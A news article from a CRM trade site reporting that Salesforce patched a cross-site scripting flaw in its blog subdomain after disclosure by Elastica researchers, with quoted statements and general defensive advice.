Dear Visitor,

Our system has found that you are using an ad-blocking browser add-on.

We just wanted to let you know that our site content is, of course, available to you absolutely free of charge.

Our ads are the only way we have to be able to bring you the latest high-quality content, which is written by professional journalists, with the help of editors, graphic designers, and our site production and I.T. staff, as well as many other talented people who work around the clock for this site.

So, we ask you to add this site to your Ad Blocker’s "white list" or to simply disable your Ad Blocker while visiting this site.

Continue on this site freely
You are here: Home / CRM Systems / Salesforce Closes Hack Attack Door
Salesforce Closes Door to Hack Attacks
Salesforce Closes Door to Hack Attacks
By Shirley Siluk / CRM Daily Like this on Facebook Tweet this Link thison Linkedin Link this on Google Plus
An injection vulnerability that could have opened the door to hackers has been patched by Salesforce after security researchers notified the company of their discovery. The vulnerability, which existed in a subdomain of the cloud-based CRM platform, could have paved the way for phishing e-mails that looked legitimate because they would have appeared to come from within the application itself.

Salesforce told us in a statement today that it investigated and fixed "a minor vulnerability impacting the blog site ',' which is not connected to the Salesforce application or customer data." The company added, "We have no evidence of impact to Salesforce customers or their data."

The patch was validated on Monday by Elastica, the San Jose-based cloud application security company that first discovered the vulnerability in early July. The apparently trustworthy phishing e-mails that could have been enabled by the vulnerability could have tricked users into providing legitimate login credentials that could have then been exploited, according to Elastica.

XSS Exploitation 'Most Prolific' Hack

Researchers in Elastica's Cloud Threat Labs said they discovered the vulnerability in a Salesforce subdomain used for blogging. The cross-site scripting XSS flaw failed to properly filter input from a remote user as part of an HTTP request, which could have allowed hackers to "steal cookies and session identifiers, force users to visit phishing sites that extract credentials, and distribute malicious code to user machines."

"Exploitation of XSS vulnerabilities is among the most prolific methods of Web application hacking today," said Aditya Sood, lead architect at Elastica's Cloud Threat Labs. "Although this particular flaw was only present in a Salesforce subdomain, exploiting the trust of the company's primary domain could have allowed attackers to easily implement phishing attacks to gain access to user credentials. With stolen credentials, attackers can then access users' accounts and exfiltrate sensitive data undetected for long periods of time."

Elastica said when it first reported its discovery to Salesforce and provided details on how to fix the problem, the company responded that it considered the vulnerability to be "less severe" because it wasn't in the main domain,, and could target only selected users. After receiving a follow-up e-mail from Elastica noting that the vulnerability had "the potential to be exploited in the wild," Salesforce then patched the flaw.

'Offensive' Strategies Against Social Engineering Attacks

We reached out to Elastica's Sood to learn more about what companies can do to protect themselves from XSS and similar vulnerabilities. He said companies should release patches as soon as possible after learning of such vulnerabilities to "reduce the window of exposure."

Companies should implement a "multi-dimensional security approach" and also be sure to educate their employees about safe surfing habits and the "perils of phishing attacks," Sood added. In addition, they should put in place security controls to require two-factor authentication on all end-user devices used to access their systems, he noted.

"Interestingly, organizations can follow an offensive approach to conduct controlled social engineering attacks, i.e., phishing attacks, to understand how the infrastructure control works and how users react to that attack," he said.

Image credit: iStock/Artist's concept .

Tell Us What You Think


Like Us on FacebookFollow Us on Twitter
© Copyright 2018 NewsFactor Network. All rights reserved. Member of Accuserve Ad Network.